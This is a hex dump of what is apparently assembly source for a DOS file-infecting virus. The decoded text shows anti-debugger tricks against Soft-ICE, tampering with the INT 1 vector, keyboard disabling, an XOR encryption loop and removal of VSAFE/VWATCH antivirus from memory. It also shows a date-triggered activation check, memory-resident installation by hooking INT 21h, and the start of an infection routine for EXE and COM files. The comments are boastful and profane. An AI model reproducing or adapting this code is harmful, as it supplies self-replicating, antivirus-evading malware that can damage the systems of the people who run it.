|00001000| 73 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |s | |
|00001010| 20 20 20 20 3b 20 73 61 | 76 65 20 73 65 67 6d 65 | ; sa|ve segme|
|00001020| 6e 74 20 72 65 67 69 73 | 74 65 72 73 20 66 6f 72 |nt regis|ters for|
|00001030| 20 45 58 45 0a 49 46 20 | 53 45 43 4f 4e 44 5f 43 | EXE.IF |SECOND_C|
|00001040| 52 59 50 54 0a 20 20 20 | 20 20 20 20 20 70 75 73 |RYPT. | pus|
|00001050| 68 20 20 20 20 64 73 0a | 64 62 67 31 3a 09 6a 6d |h ds.|dbg1:.jm|
|00001060| 70 09 6d 6f 76 5f 73 69 | 09 09 09 3b 20 31 0a 09 |p.mov_si|...; 1..|
|00001070| 64 62 09 30 42 45 68 09 | 09 09 3b 20 4d 4f 56 20 |db.0BEh.|..; MOV |
|00001080| 53 49 2c 58 58 58 58 0a | 6d 6f 76 5f 73 69 3a 09 |SI,XXXX.|mov_si:.|
|00001090| 64 62 09 30 42 45 68 09 | 09 09 3b 20 4d 4f 56 20 |db.0BEh.|..; MOV |
|000010a0| 53 49 2c 58 58 58 58 0a | 72 65 6c 32 5f 6f 66 66 |SI,XXXX.|rel2_off|
|000010b0| 20 64 77 09 6f 66 66 73 | 65 74 20 68 65 61 70 2b | dw.offs|et heap+|
|000010c0| 31 30 30 30 68 09 3b 20 | 6f 72 67 20 63 6f 70 79 |1000h.; |org copy|
|000010d0| 3a 20 70 74 72 20 77 61 | 79 20 6f 75 74 20 74 68 |: ptr wa|y out th|
|000010e0| 65 72 65 0a 09 63 61 6c | 6c 09 73 68 69 74 0a 61 |ere..cal|l.shit.a|
|000010f0| 64 64 5f 62 70 3a 09 69 | 6e 74 09 31 39 68 09 09 |dd_bp:.i|nt.19h..|
|00001100| 09 3b 20 66 75 63 6b 20 | 27 65 6d 20 69 66 20 74 |.; fuck |'em if t|
|00001110| 68 65 79 20 73 6b 69 70 | 70 65 64 0a 09 6a 6d 70 |hey skip|ped..jmp|
|00001120| 09 69 6e 5f 6f 70 09 09 | 09 3b 20 31 0a 09 64 62 |.in_op..|.; 1..db|
|00001130| 09 30 42 41 68 09 09 09 | 3b 20 4d 4f 56 20 44 58 |.0BAh...|; MOV DX|
|00001140| 2c 58 58 58 58 0a 69 6e | 5f 6f 70 3a 09 69 6e 09 |,XXXX.in|_op:.in.|
|00001150| 61 6c 2c 32 31 68 0a 09 | 70 75 73 68 09 61 78 0a |al,21h..|push.ax.|
|00001160| 09 6f 72 09 61 6c 2c 30 | 32 0a 09 6a 6d 70 09 6b |.or.al,0|2..jmp.k|
|00001170| 69 6c 6c 5f 6b 65 79 62 | 09 09 3b 20 31 0a 09 64 |ill_keyb|..; 1..d|
|00001180| 62 09 30 43 36 68 0a 6b | 69 6c 6c 5f 6b 65 79 62 |b.0C6h.k|ill_keyb|
|00001190| 3a 20 6f 75 74 09 32 31 | 68 2c 61 6c 09 09 09 3b |: out.21|h,al...;|
|000011a0| 20 6b 65 79 62 6f 61 72 | 64 3d 6f 66 66 0a 09 63 | keyboar|d=off..c|
|000011b0| 61 6c 6c 09 73 68 69 74 | 36 0a 70 61 73 74 5f 73 |all.shit|6.past_s|
|000011c0| 68 69 74 3a 20 6a 6d 70 | 09 64 62 6c 5f 63 72 79 |hit: jmp|.dbl_cry|
|000011d0| 70 74 0a 73 68 69 74 37 | 3a 0a 09 78 6f 72 09 61 |pt.shit7|:..xor.a|
|000011e0| 78 2c 61 78 09 09 09 3b | 6e 75 6c 6c 20 65 73 0a |x,ax...;|null es.|
|000011f0| 09 6d 6f 76 09 65 73 2c | 61 78 0a 09 6d 6f 76 09 |.mov.es,|ax..mov.|
|00001200| 62 78 2c 77 6f 72 64 20 | 70 74 72 20 65 73 3a 20 |bx,word |ptr es: |
|00001210| 5b 30 36 5d 09 3b 67 65 | 74 20 49 4e 54 20 31 0a |[06].;ge|t INT 1.|
|00001220| 09 72 65 74 0a 73 68 69 | 74 3a 0a 09 6d 6f 76 09 |.ret.shi|t:..mov.|
|00001230| 77 6f 72 64 20 70 74 72 | 20 63 73 3a 20 61 64 64 |word ptr| cs: add|
|00001240| 5f 62 70 5b 62 70 5d 2c | 30 46 35 30 33 68 20 3b |_bp[bp],|0F503h ;|
|00001250| 41 44 44 20 53 49 2c 42 | 50 0a 09 6d 6f 76 09 77 |ADD SI,B|P..mov.w|
|00001260| 6f 72 64 20 70 74 72 20 | 63 73 3a 20 64 65 63 5f |ord ptr |cs: dec_|
|00001270| 73 69 5b 62 70 5d 2c 30 | 35 43 31 37 68 20 3b 72 |si[bp],0|5C17h ;r|
|00001280| 65 73 65 74 20 6f 75 72 | 20 73 68 69 74 20 73 69 |eset our| shit si|
|00001290| 73 74 65 72 0a 09 72 65 | 74 0a 73 68 69 74 32 3a |ster..re|t.shit2:|
|000012a0| 0a 09 6d 6f 76 09 77 6f | 72 64 20 70 74 72 20 63 |..mov.wo|rd ptr c|
|000012b0| 73 3a 20 64 65 63 5f 73 | 69 5b 62 70 5d 2c 34 45 |s: dec_s|i[bp],4E|
|000012c0| 34 45 68 0a 09 6d 6f 76 | 09 77 6f 72 64 20 70 74 |4Eh..mov|.word pt|
|000012d0| 72 20 63 73 3a 20 61 64 | 64 5f 62 70 5b 62 70 5d |r cs: ad|d_bp[bp]|
|000012e0| 2c 31 39 43 44 68 20 3b | 72 65 73 65 74 20 6f 75 |,19CDh ;|reset ou|
|000012f0| 72 20 73 68 69 74 20 62 | 72 6f 74 68 65 72 0a 09 |r shit b|rother..|
|00001300| 63 61 6c 6c 09 73 68 69 | 74 33 0a 09 6a 6e 63 09 |call.shi|t3..jnc.|
|00001310| 63 6f 64 65 5f 73 74 61 | 72 74 09 09 3b 64 69 64 |code_sta|rt..;did|
|00001320| 20 74 68 65 79 20 73 6b | 69 70 20 73 68 69 74 33 | they sk|ip shit3|
|00001330| 3f 0a 09 78 6f 72 09 64 | 78 2c 63 78 0a 09 72 65 |?..xor.d|x,cx..re|
|00001340| 74 0a 09 64 62 09 30 45 | 41 68 09 09 09 3b 4a 4d |t..db.0E|Ah...;JM|
|00001350| 50 20 46 41 52 20 58 3a | 58 0a 73 68 69 74 34 3a |P FAR X:|X.shit4:|
|00001360| 0a 20 20 20 20 20 20 20 | 20 64 62 20 20 20 20 20 |. | db |
|00001370| 20 30 42 41 68 20 20 20 | 20 20 20 20 20 20 20 20 | 0BAh | |
|00001380| 20 20 20 20 20 20 20 20 | 20 3b 4d 4f 56 20 44 58 | | ;MOV DX|
|00001390| 2c 58 58 58 58 0a 73 65 | 63 5f 65 6e 63 09 64 77 |,XXXX.se|c_enc.dw|
|000013a0| 09 30 0a 20 20 20 20 20 | 20 20 20 6d 6f 76 20 20 |.0. | mov |
|000013b0| 20 20 20 64 69 2c 34 41 | 34 44 68 20 20 20 20 20 | di,4A|4Dh |
|000013c0| 20 20 20 20 20 20 20 20 | 20 20 20 3b 70 72 65 70 | | ;prep|
|000013d0| 61 72 65 20 66 6f 72 20 | 53 6f 66 74 2d 69 63 65 |are for |Soft-ice|
|000013e0| 0a 09 72 65 74 0a 73 68 | 69 74 33 3a 0a 20 20 20 |..ret.sh|it3:. |
|000013f0| 20 20 20 20 20 6d 6f 76 | 20 20 20 20 20 61 78 2c | mov| ax,|
|00001400| 39 31 31 68 20 20 20 20 | 20 20 20 20 20 20 20 20 |911h | |
|00001410| 20 20 20 20 20 3b 73 6f | 66 74 2d 69 63 65 20 2d | ;so|ft-ice -|
|00001420| 20 65 78 65 63 75 74 65 | 20 63 6f 6d 6d 61 6e 64 | execute| command|
|00001430| 0a 20 20 20 20 20 20 20 | 20 63 61 6c 6c 20 20 20 |. | call |
|00001440| 20 73 68 69 74 34 0a 20 | 20 20 20 20 20 20 20 73 | shit4. | s|
|00001450| 74 63 0a 09 64 65 63 09 | 77 6f 72 64 20 70 74 72 |tc..dec.|word ptr|
|00001460| 20 65 73 3a 20 5b 30 36 | 5d 09 3b 32 2d 6b 69 6c | es: [06|].;2-kil|
|00001470| 6c 20 49 4e 54 20 31 20 | 76 65 63 74 6f 72 0a 20 |l INT 1 |vector. |
|00001480| 20 20 20 20 20 20 20 70 | 75 73 68 20 20 20 20 73 | p|ush s|
|00001490| 69 0a 20 20 20 20 20 20 | 20 20 6d 6f 76 20 20 20 |i. | mov |
|000014a0| 20 20 73 69 2c 34 36 34 | 37 68 20 20 20 20 20 20 | si,464|7h |
|000014b0| 20 20 20 20 20 20 20 20 | 20 20 3b 73 6f 66 74 2d | | ;soft-|
|000014c0| 69 63 65 0a 20 20 20 20 | 20 20 20 20 69 6e 74 20 |ice. | int |
|000014d0| 20 20 20 20 33 20 20 20 | 20 20 20 20 20 20 20 20 | 3 | |
|000014e0| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 63 61 6c | | ;cal|
|000014f0| 6c 20 53 49 20 65 78 65 | 63 75 74 65 20 2d 20 44 |l SI exe|cute - D|
|00001500| 53 3a 44 58 2d 67 61 72 | 62 61 67 65 0a 20 20 20 |S:DX-gar|bage. |
|00001510| 20 20 20 20 20 70 6f 70 | 20 20 20 20 20 73 69 0a | pop| si.|
|00001520| 20 20 20 20 20 20 20 20 | 72 65 74 0a 0a 73 68 69 | |ret..shi|
|00001530| 74 36 3a 09 6d 6f 76 09 | 62 79 74 65 20 70 74 72 |t6:.mov.|byte ptr|
|00001540| 20 63 73 3a 20 70 61 73 | 74 5f 73 68 69 74 5b 62 | cs: pas|t_shit[b|
|00001550| 70 5d 2c 30 45 42 68 0a | 09 6f 75 74 09 32 31 68 |p],0EBh.|.out.21h|
|00001560| 2c 61 6c 09 09 09 3b 20 | 74 72 79 20 74 75 72 6e |,al...; |try turn|
|00001570| 69 6e 67 20 6b 65 79 62 | 6f 61 72 64 20 6f 66 66 |ing keyb|oard off|
|00001580| 20 61 67 61 69 6e 0a 09 | 72 65 74 0a 0a 64 62 6c | again..|ret..dbl|
|00001590| 5f 63 72 79 70 74 3a 20 | 09 09 09 09 3b 20 6d 61 |_crypt: |....; ma|
|000015a0| 69 6e 20 70 6f 72 74 69 | 6f 6e 20 6f 66 20 63 72 |in porti|on of cr|
|000015b0| 79 70 74 6f 72 0a 09 6d | 6f 76 09 63 78 2c 28 6f |yptor..m|ov.cx,(o|
|000015c0| 66 66 73 65 74 20 68 65 | 61 70 2d 6f 66 66 73 65 |ffset he|ap-offse|
|000015d0| 74 20 72 65 74 32 5f 62 | 79 74 65 29 2f 32 2b 31 |t ret2_b|yte)/2+1|
|000015e0| 0a 09 63 61 6c 6c 09 73 | 68 69 74 37 0a 64 62 6c |..call.s|hit7.dbl|
|000015f0| 5f 6c 6f 6f 70 3a 0a 09 | 6a 6d 70 09 24 2b 33 09 |_loop:..|jmp.$+3.|
|00001600| 09 09 3b 20 31 0a 09 64 | 62 09 30 33 34 68 09 09 |..; 1..d|b.034h..|
|00001610| 09 3b 20 58 4f 52 20 2e | 2e 2e 0a 09 63 61 6c 6c |.; XOR .|....call|
|00001620| 09 73 68 69 74 33 09 09 | 09 3b 20 6e 65 73 74 65 |.shit3..|.; neste|
|00001630| 64 20 69 73 20 74 68 65 | 20 73 65 74 20 44 58 0a |d is the| set DX.|
|00001640| 09 78 63 68 67 09 73 70 | 2c 64 78 09 09 09 3b 20 |.xchg.sp|,dx...; |
|00001650| 78 63 68 67 20 53 50 20 | 61 6e 64 20 44 58 0a 09 |xchg SP |and DX..|
|00001660| 6a 6d 70 09 78 6f 72 5f | 6f 70 09 09 09 3b 20 31 |jmp.xor_|op...; 1|
|00001670| 0a 09 64 62 09 30 45 41 | 68 09 09 09 3b 20 4a 4d |..db.0EA|h...; JM|
|00001680| 50 20 46 41 52 20 58 3a | 58 0a 78 6f 72 5f 6f 70 |P FAR X:|X.xor_op|
|00001690| 3a 09 78 6f 72 09 77 6f | 72 64 20 70 74 72 20 63 |:.xor.wo|rd ptr c|
|000016a0| 73 3a 20 5b 73 69 5d 2c | 73 70 09 3b 20 74 68 65 |s: [si],|sp.; the|
|000016b0| 20 72 65 61 6c 20 58 4f | 52 20 62 61 62 79 2e 2e | real XO|R baby..|
|000016c0| 0a 09 78 63 68 67 09 73 | 70 2c 64 78 09 09 09 3b |..xchg.s|p,dx...;|
|000016d0| 20 72 65 73 74 6f 72 65 | 20 53 50 0a 09 63 61 6c | restore| SP..cal|
|000016e0| 6c 09 73 68 69 74 32 0a | 64 65 63 5f 73 69 3a 09 |l.shit2.|dec_si:.|
|000016f0| 70 6f 70 09 73 73 09 09 | 09 3b 20 66 75 63 6b 20 |pop.ss..|.; fuck |
|00001700| 27 65 6d 20 69 66 20 74 | 68 65 79 20 73 6b 69 70 |'em if t|hey skip|
|00001710| 70 65 64 20 73 68 69 74 | 32 0a 09 70 6f 70 09 73 |ped shit|2..pop.s|
|00001720| 70 0a 20 20 20 20 20 20 | 20 20 69 6e 74 20 20 20 |p. | int |
|00001730| 20 20 33 0a 09 78 63 68 | 67 09 73 70 2c 62 78 09 | 3..xch|g.sp,bx.|
|00001740| 09 09 3b 20 53 50 3d 77 | 6f 72 64 20 6f 66 20 6f |..; SP=w|ord of o|
|00001750| 6c 64 20 69 6e 74 20 31 | 20 76 65 63 0a 09 64 65 |ld int 1| vec..de|
|00001760| 63 09 63 78 0a 09 6d 6f | 76 09 65 73 3a 20 5b 30 |c.cx..mo|v.es: [0|
|00001770| 36 5d 2c 73 70 09 09 3b | 20 72 65 73 74 6f 72 65 |6],sp..;| restore|
|00001780| 20 69 6e 74 20 31 20 76 | 65 63 74 6f 72 0a 09 78 | int 1 v|ector..x|
|00001790| 63 68 67 09 73 70 2c 62 | 78 09 09 09 3b 20 72 65 |chg.sp,b|x...; re|
|000017a0| 73 74 6f 72 65 20 53 50 | 0a 09 6a 6e 7a 09 64 62 |store SP|..jnz.db|
|000017b0| 6c 5f 6c 6f 6f 70 0a 72 | 65 74 32 5f 62 79 74 65 |l_loop.r|et2_byte|
|000017c0| 20 64 62 09 39 30 68 2c | 39 30 68 0a 0a 3b 2d 2d | db.90h,|90h..;--|
|000017d0| 2d 2d 20 53 74 61 72 74 | 20 6f 66 20 61 6e 6f 74 |-- Start| of anot|
|000017e0| 68 65 72 20 61 72 74 69 | 66 69 63 69 61 6c 20 6c |her arti|ficial l|
|000017f0| 69 66 65 66 6f 72 6d 0a | 0a 45 4e 44 49 46 0a 63 |ifeform.|.ENDIF.c|
|00001800| 6f 64 65 5f 73 74 61 72 | 74 3a 0a 49 46 20 53 45 |ode_star|t:.IF SE|
|00001810| 43 4f 4e 44 5f 43 52 59 | 50 54 0a 20 20 20 20 20 |COND_CRY|PT. |
|00001820| 20 20 20 70 6f 70 20 20 | 20 20 20 61 78 20 65 73 | pop | ax es|
|00001830| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00001840| 20 20 20 3b 20 47 65 74 | 20 70 6f 72 74 20 72 65 | ; Get| port re|
|00001850| 67 20 62 69 74 73 20 28 | 45 53 3d 50 53 50 29 0a |g bits (|ES=PSP).|
|00001860| 09 6f 75 74 09 32 31 68 | 2c 61 6c 09 09 09 3b 20 |.out.21h|,al...; |
|00001870| 72 65 73 74 6f 72 65 20 | 6b 65 79 62 6f 61 72 64 |restore |keyboard|
|00001880| 0a 45 4e 44 49 46 0a 0a | 20 20 20 20 20 20 20 20 |.ENDIF..| |
|00001890| 6d 6f 76 20 20 20 20 20 | 63 73 3a 20 61 63 74 69 |mov |cs: acti|
|000018a0| 76 61 74 65 5b 62 70 5d | 2c 30 20 20 20 20 20 20 |vate[bp]|,0 |
|000018b0| 3b 20 72 65 73 65 74 20 | 61 63 74 69 76 61 74 69 |; reset |activati|
|000018c0| 6f 6e 20 74 6f 67 67 6c | 65 0a 09 6d 6f 76 09 63 |on toggl|e..mov.c|
|000018d0| 73 3a 20 6d 65 6d 5f 77 | 6f 72 64 5b 62 70 5d 2c |s: mem_w|ord[bp],|
|000018e0| 30 09 3b 20 72 65 73 65 | 74 20 6d 65 6d 2e 20 65 |0.; rese|t mem. e|
|000018f0| 6e 63 72 79 70 74 69 6f | 6e 0a 0a 09 69 6e 63 09 |ncryptio|n...inc.|
|00001900| 73 69 09 09 09 3b 20 53 | 49 21 3d 30 0a 09 6d 6f |si...; S|I!=0..mo|
|00001910| 76 09 64 78 2c 76 73 61 | 66 65 5f 77 6f 72 64 09 |v.dx,vsa|fe_word.|
|00001920| 09 3b 20 72 65 6d 6f 76 | 65 20 56 53 41 46 45 2f |.; remov|e VSAFE/|
|00001930| 56 57 41 54 43 48 20 66 | 72 6f 6d 20 6d 65 6d 6f |VWATCH f|rom memo|
|00001940| 72 79 0a 09 6d 6f 76 09 | 61 78 2c 30 46 41 30 31 |ry..mov.|ax,0FA01|
|00001950| 68 09 09 3b 20 26 20 63 | 68 65 63 6b 20 66 6f 72 |h..; & c|heck for|
|00001960| 20 72 65 73 69 64 65 6e | 63 79 20 6f 66 20 76 69 | residen|cy of vi|
|00001970| 72 75 73 20 74 6f 6f 0a | 09 69 6e 74 09 32 31 68 |rus too.|.int.21h|
|00001980| 0a 09 6f 72 09 73 69 2c | 73 69 09 09 09 3b 20 69 |..or.si,|si...; i|
|00001990| 66 20 53 49 3d 30 20 74 | 68 65 6e 20 69 74 27 73 |f SI=0 t|hen it's|
|000019a0| 20 75 73 0a 09 6a 7a 09 | 6e 6f 5f 69 6e 73 74 61 | us..jz.|no_insta|
|000019b0| 6c 6c 0a 0a 09 6d 6f 76 | 09 61 68 2c 32 61 68 09 |ll...mov|.ah,2ah.|
|000019c0| 09 09 3b 20 67 65 74 20 | 64 61 74 65 0a 09 69 6e |..; get |date..in|
|000019d0| 74 09 32 31 68 0a 09 63 | 6d 70 09 64 6c 2c 6b 69 |t.21h..c|mp.dl,ki|
|000019e0| 6c 6c 5f 64 61 74 65 09 | 09 3b 20 69 73 20 69 74 |ll_date.|.; is it|
|000019f0| 20 74 69 6d 65 20 74 6f | 20 61 63 74 69 76 61 74 | time to| activat|
|00001a00| 65 3f 0a 09 6a 6e 7a 09 | 6e 6f 74 5f 74 69 6d 65 |e?..jnz.|not_time|
|00001a10| 0a 09 6d 6f 76 09 63 73 | 3a 20 61 63 74 69 76 61 |..mov.cs|: activa|
|00001a20| 74 65 5b 62 70 5d 2c 31 | 0a 0a 6e 6f 74 5f 74 69 |te[bp],1|..not_ti|
|00001a30| 6d 65 3a 0a 0a 09 6d 6f | 76 09 61 78 2c 65 73 09 |me:...mo|v.ax,es.|
|00001a40| 09 09 3b 20 50 53 50 20 | 73 65 67 6d 65 6e 74 20 |..; PSP |segment |
|00001a50| 20 20 2d 20 70 6f 70 70 | 65 64 20 66 72 6f 6d 20 | - popp|ed from |
|00001a60| 44 53 0a 09 64 65 63 09 | 61 78 09 09 09 3b 20 6d |DS..dec.|ax...; m|
|00001a70| 63 62 20 62 65 6c 6f 77 | 20 50 53 50 20 6d 30 6e |cb below| PSP m0n|
|00001a80| 0a 09 6d 6f 76 09 64 73 | 2c 61 78 09 09 09 3b 20 |..mov.ds|,ax...; |
|00001a90| 44 53 3d 4d 43 42 20 73 | 65 67 0a 09 63 6d 70 09 |DS=MCB s|eg..cmp.|
|00001aa0| 62 79 74 65 20 70 74 72 | 20 64 73 3a 20 5b 30 5d |byte ptr| ds: [0]|
|00001ab0| 2c 27 5a 27 09 3b 20 49 | 73 20 74 68 69 73 20 74 |,'Z'.; I|s this t|
|00001ac0| 68 65 20 6c 61 73 74 20 | 4d 43 42 20 69 6e 20 63 |he last |MCB in c|
|00001ad0| 68 61 69 6e 3f 0a 09 6a | 6e 7a 09 6e 6f 5f 69 6e |hain?..j|nz.no_in|
|00001ae0| 73 74 61 6c 6c 0a 09 73 | 75 62 09 77 6f 72 64 20 |stall..s|ub.word |
|00001af0| 70 74 72 20 64 73 3a 20 | 5b 33 5d 2c 28 28 28 76 |ptr ds: |[3],(((v|
|00001b00| 65 6e 64 2d 73 74 61 72 | 74 2b 31 30 32 33 29 2a |end-star|t+1023)*|
|00001b10| 32 29 2f 31 30 32 34 29 | 2a 36 34 20 3b 20 61 6c |2)/1024)|*64 ; al|
|00001b20| 6c 6f 63 20 4d 43 42 0a | 09 73 75 62 09 77 6f 72 |loc MCB.|.sub.wor|
|00001b30| 64 20 70 74 72 20 64 73 | 3a 20 5b 31 32 68 5d 2c |d ptr ds|: [12h],|
|00001b40| 28 28 28 76 65 6e 64 2d | 73 74 61 72 74 2b 31 30 |(((vend-|start+10|
|00001b50| 32 33 29 2a 32 29 2f 31 | 30 32 34 29 2a 36 34 20 |23)*2)/1|024)*64 |
|00001b60| 3b 20 61 6c 6c 6f 63 20 | 50 53 50 0a 09 6d 6f 76 |; alloc |PSP..mov|
|00001b70| 09 65 73 2c 77 6f 72 64 | 20 70 74 72 20 64 73 3a |.es,word| ptr ds:|
|00001b80| 20 5b 31 32 68 5d 09 3b | 20 67 65 74 20 68 69 67 | [12h].;| get hig|
|00001b90| 68 20 6d 65 6d 20 73 65 | 67 0a 09 70 75 73 68 09 |h mem se|g..push.|
|00001ba0| 63 73 0a 09 70 6f 70 09 | 64 73 0a 09 6d 6f 76 09 |cs..pop.|ds..mov.|
|00001bb0| 73 69 2c 62 70 0a 09 6d | 6f 76 09 63 78 2c 28 6f |si,bp..m|ov.cx,(o|
|00001bc0| 66 66 73 65 74 20 76 65 | 6e 64 20 2d 20 6f 66 66 |ffset ve|nd - off|
|00001bd0| 73 65 74 20 73 74 61 72 | 74 29 2f 32 2b 31 0a 09 |set star|t)/2+1..|
|00001be0| 78 6f 72 09 64 69 2c 64 | 69 0a 09 72 65 70 09 6d |xor.di,d|i..rep.m|
|00001bf0| 6f 76 73 77 09 09 09 3b | 20 63 6f 70 79 20 63 6f |ovsw...;| copy co|
|00001c00| 64 65 20 74 6f 20 6e 65 | 77 20 73 65 67 0a 09 78 |de to ne|w seg..x|
|00001c10| 6f 72 09 61 78 2c 61 78 | 0a 09 6d 6f 76 09 64 73 |or.ax,ax|..mov.ds|
|00001c20| 2c 61 78 09 09 09 3b 20 | 6e 75 6c 6c 20 64 73 0a |,ax...; |null ds.|
|00001c30| 09 70 75 73 68 09 64 73 | 0a 09 6c 64 73 09 61 78 |.push.ds|..lds.ax|
|00001c40| 2c 64 73 3a 20 5b 32 31 | 68 2a 34 5d 09 09 3b 20 |,ds: [21|h*4]..; |
|00001c50| 67 65 74 20 32 31 68 20 | 76 65 63 74 6f 72 0a 09 |get 21h |vector..|
|00001c60| 6d 6f 76 09 65 73 3a 20 | 77 6f 72 64 20 70 74 72 |mov.es: |word ptr|
|00001c70| 20 6f 6c 64 32 31 2b 32 | 2c 64 73 09 3b 20 73 61 | old21+2|,ds.; sa|
|00001c80| 76 65 20 53 3a 4f 0a 09 | 6d 6f 76 09 65 73 3a 20 |ve S:O..|mov.es: |
|00001c90| 77 6f 72 64 20 70 74 72 | 20 6f 6c 64 32 31 2c 61 |word ptr| old21,a|
|00001ca0| 78 0a 09 70 6f 70 09 64 | 73 0a 09 6d 6f 76 09 64 |x..pop.d|s..mov.d|
|00001cb0| 73 3a 20 5b 32 31 68 2a | 34 2b 32 5d 2c 65 73 09 |s: [21h*|4+2],es.|
|00001cc0| 3b 20 6e 65 77 20 69 6e | 74 20 32 31 68 20 73 65 |; new in|t 21h se|
|00001cd0| 67 0a 09 6d 6f 76 09 64 | 73 3a 20 5b 32 31 68 2a |g..mov.d|s: [21h*|
|00001ce0| 34 5d 2c 6f 66 66 73 65 | 74 20 6e 65 77 32 31 20 |4],offse|t new21 |
|00001cf0| 3b 20 6e 65 77 20 6f 66 | 66 73 65 74 0a 0a 09 63 |; new of|fset...c|
|00001d00| 61 6c 6c 09 67 65 74 5f | 72 61 6e 64 6f 6d 0a 09 |all.get_|random..|
|00001d10| 63 6d 70 09 64 6c 2c 35 | 0a 09 6a 6c 65 09 6e 6f |cmp.dl,5|..jle.no|
|00001d20| 5f 69 6e 73 74 61 6c 6c | 0a 09 73 75 62 09 62 79 |_install|..sub.by|
|00001d30| 74 65 20 70 74 72 20 64 | 73 3a 20 5b 34 31 33 68 |te ptr d|s: [413h|
|00001d40| 5d 2c 28 28 6f 66 66 73 | 65 74 20 76 65 6e 64 2d |],((offs|et vend-|
|00001d50| 6f 66 66 73 65 74 20 73 | 74 61 72 74 2b 31 30 32 |offset s|tart+102|
|00001d60| 33 29 2a 32 29 2f 31 30 | 32 34 20 3b 2d 74 6f 74 |3)*2)/10|24 ;-tot|
|00001d70| 61 6c 6d 65 6d 0a 0a 6e | 6f 5f 69 6e 73 74 61 6c |almem..n|o_instal|
|00001d80| 6c 3a 0a 0a 09 78 6f 72 | 09 73 69 2c 73 69 09 09 |l:...xor|.si,si..|
|00001d90| 09 3b 20 6e 75 6c 6c 20 | 72 65 67 73 2e 2e 0a 09 |.; null |regs....|
|00001da0| 78 6f 72 09 64 69 2c 64 | 69 09 09 09 3b 20 73 6f |xor.di,d|i...; so|
|00001db0| 6d 65 20 70 72 6f 67 73 | 20 61 63 74 75 61 6c 6c |me progs| actuall|
|00001dc0| 79 20 63 61 72 65 2e 2e | 0a 09 78 6f 72 09 61 78 |y care..|..xor.ax|
|00001dd0| 2c 61 78 0a 09 78 6f 72 | 09 62 78 2c 62 78 0a 09 |,ax..xor|.bx,bx..|
|00001de0| 78 6f 72 09 64 78 2c 64 | 78 0a 0a 09 70 6f 70 09 |xor.dx,d|x...pop.|
|00001df0| 65 73 20 64 73 09 09 09 | 3b 20 72 65 73 74 6f 72 |es ds...|; restor|
|00001e00| 65 20 45 53 20 44 53 0a | 09 63 6d 70 09 63 73 3a |e ES DS.|.cmp.cs:|
|00001e10| 20 65 78 65 5f 70 68 69 | 6c 65 5b 62 70 5d 2c 31 | exe_phi|le[bp],1|
|00001e20| 0a 09 6a 7a 09 65 78 65 | 5f 72 65 74 75 72 6e 0a |..jz.exe|_return.|
|00001e30| 0a 09 6c 65 61 09 73 69 | 2c 6f 72 67 5f 62 79 74 |..lea.si|,org_byt|
|00001e40| 65 73 5b 62 70 5d 09 3b | 20 63 6f 6d 20 72 65 74 |es[bp].;| com ret|
|00001e50| 75 72 6e 0a 09 6d 6f 76 | 09 64 69 2c 30 31 30 30 |urn..mov|.di,0100|
|00001e60| 68 09 09 3b 20 2d 72 65 | 73 74 6f 72 65 20 66 69 |h..; -re|store fi|
|00001e70| 72 73 74 20 34 20 62 79 | 74 65 73 0a 09 6d 6f 76 |rst 4 by|tes..mov|
|00001e80| 73 77 0a 09 6d 6f 76 73 | 77 0a 0a 09 6d 6f 76 09 |sw..movs|w...mov.|
|00001e90| 61 78 2c 31 30 30 68 09 | 09 09 3b 20 6a 75 6d 70 |ax,100h.|..; jump|
|00001ea0| 20 62 61 63 6b 20 74 6f | 20 31 30 30 68 0a 09 70 | back to| 100h..p|
|00001eb0| 75 73 68 09 61 78 0a 5f | 72 65 74 3a 09 72 65 74 |ush.ax._|ret:.ret|
|00001ec0| 0a 0a 65 78 65 5f 72 65 | 74 75 72 6e 3a 0a 09 6d |..exe_re|turn:..m|
|00001ed0| 6f 76 09 63 78 2c 64 73 | 09 09 09 3b 20 63 61 6c |ov.cx,ds|...; cal|
|00001ee0| 63 2e 20 72 65 61 6c 20 | 43 53 0a 09 61 64 64 09 |c. real |CS..add.|
|00001ef0| 63 78 2c 31 30 68 0a 09 | 61 64 64 09 77 6f 72 64 |cx,10h..|add.word|
|00001f00| 20 70 74 72 20 63 73 3a | 20 5b 65 78 65 5f 6a 75 | ptr cs:| [exe_ju|
|00001f10| 6d 70 2b 32 2b 62 70 5d | 2c 63 78 0a 09 69 6e 74 |mp+2+bp]|,cx..int|
|00001f20| 09 33 09 09 09 3b 20 66 | 69 78 20 70 72 65 66 65 |.3...; f|ix prefe|
|00001f30| 74 63 68 0a 09 63 6c 69 | 0a 09 6d 6f 76 09 73 70 |tch..cli|..mov.sp|
|00001f40| 2c 63 73 3a 20 6f 6c 64 | 73 70 5b 62 70 5d 09 3b |,cs: old|sp[bp].;|
|00001f50| 20 72 65 73 74 6f 72 65 | 20 6f 6c 64 20 53 50 2e | restore| old SP.|
|00001f60| 2e 0a 09 73 74 69 0a 09 | 64 62 09 30 65 61 68 0a |...sti..|db.0eah.|
|00001f70| 65 78 65 5f 6a 75 6d 70 | 20 64 64 09 30 0a 6f 6c |exe_jump| dd.0.ol|
|00001f80| 64 73 70 09 64 77 09 30 | 0a 65 78 65 5f 70 68 69 |dsp.dw.0|.exe_phi|
|00001f90| 6c 65 20 64 62 09 30 0a | 0a 3b 2d 2d 2d 2d 2d 2d |le db.0.|.;------|
|00001fa0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001fb0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001fc0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001fd0| 2d 2d 2d 2d 0a 3b 20 49 | 6e 66 65 63 74 69 6f 6e |----.; I|nfection|
|00001fe0| 20 72 6f 75 74 69 6e 65 | 20 2d 20 63 61 6c 6c 65 | routine| - calle|
|00001ff0| 64 20 66 72 6f 6d 20 49 | 4e 54 20 32 31 68 20 68 |d from I|NT 21h h|
|00002000| 61 6e 64 6c 65 72 2e 0a | 3b 20 20 20 20 44 53 3a |andler..|; DS:|
|00002010| 44 58 3d 66 6e 61 6d 65 | 0a 3b 20 20 20 20 20 20 |DX=fname|.; |
|00002020| 41 73 73 75 6d 65 73 20 | 45 58 45 20 69 66 20 66 |Assumes |EXE if f|
